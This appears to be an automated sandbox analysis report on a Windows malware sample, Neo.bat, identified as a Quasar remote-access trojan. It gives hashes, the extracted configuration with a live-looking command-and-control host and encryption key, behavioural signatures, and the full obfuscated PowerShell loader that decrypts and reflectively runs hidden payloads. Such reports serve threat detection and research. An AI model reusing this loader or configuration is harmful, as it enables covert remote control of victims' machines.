Analysis
-
max time kernel
91s -
max time network
93s -
platform
windows11-21h2_x64 -
resource
win11-20240611-en -
resource tags
arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system -
submitted
28-06-2024 23:55
Static task
static1
Behavioral task
behavioral1
Sample
Neo.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Neo.bat
Resource
win10v2004-20240508-en
General
-
Target
Neo.bat
-
Size
272KB
-
MD5
7e4958f049e5dac26748252f3447d3a3
-
SHA1
ee9dcf7b4eb963547edc6adb524e70a20a29aa03
-
SHA256
afd1e3df846e293a28e0cbf7c2d75d14b2741870f4f4d9821a52eb8444ccf182
-
SHA512
b0c40b52ae2543dad9db1b6dd1bd3b13407843715ad0f419d7520b90bb4aed6235187a9baf1bbe7b852c4e39911e65150ef28455a8e52225bc04ab4b8bc39160
-
SSDEEP
6144:l73aNpEWlF7vxuEGAM5sfaHX+Of9iGUfKNjkXtYEgXoTb2k:lLmEWJjMi0X3ViGUf8ctVaY
Malware Config
Extracted
quasar
1.1.0
Slave
runderscore00-42512.portmap.io:42512
QSR_MUTEX_aYgVTolyJfnSo2kPQj
-
encryption_key
Yf65C7zFbniWDCy7fhUm
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral3/memory/4412-24-0x00000000075B0000-0x000000000760E000-memory.dmp family_quasar -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 2 4412 powershell.exe 4 4412 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 5016 4412 WerFault.exe powershell.exe 3088 4412 WerFault.exe powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 4412 powershell.exe 4412 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4412 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 4412 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 3180 wrote to memory of 4412 3180 cmd.exe powershell.exe PID 3180 wrote to memory of 4412 3180 cmd.exe powershell.exe PID 3180 wrote to memory of 4412 3180 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Neo.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3180 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/3Efcn+SDEpJR1JenkZ6Rs7BtpqldOJo1ZPEc5aK6j4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('caD4PIX78HWMO7N++ZAzJA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $hEySi=New-Object System.IO.MemoryStream(,$param_var); $iTdjt=New-Object System.IO.MemoryStream; $eJQAi=New-Object System.IO.Compression.GZipStream($hEySi, [IO.Compression.CompressionMode]::Decompress); $eJQAi.CopyTo($iTdjt); $eJQAi.Dispose(); $hEySi.Dispose(); $iTdjt.Dispose(); $iTdjt.ToArray();}function execute_function($param_var,$param2_var){ $PuVCg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $yPbYO=$PuVCg.EntryPoint; $yPbYO.Invoke($null, $param2_var);}$xkpDo = 'C:\Users\Admin\AppData\Local\Temp\Neo.bat';$host.UI.RawUI.WindowTitle = $xkpDo;$FaHLG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($xkpDo).Split([Environment]::NewLine);foreach ($CebJO in $FaHLG) { if ($CebJO.StartsWith(':: ')) { $KEPuw=$CebJO.Substring(3); break; }}$payloads_var=[string[]]$KEPuw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4412 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 28083⤵
- Program crash
PID:5016 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 28083⤵
- Program crash
PID:3088
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4412 -ip 44121⤵PID:1076
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4412 -ip 44121⤵PID:3092
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82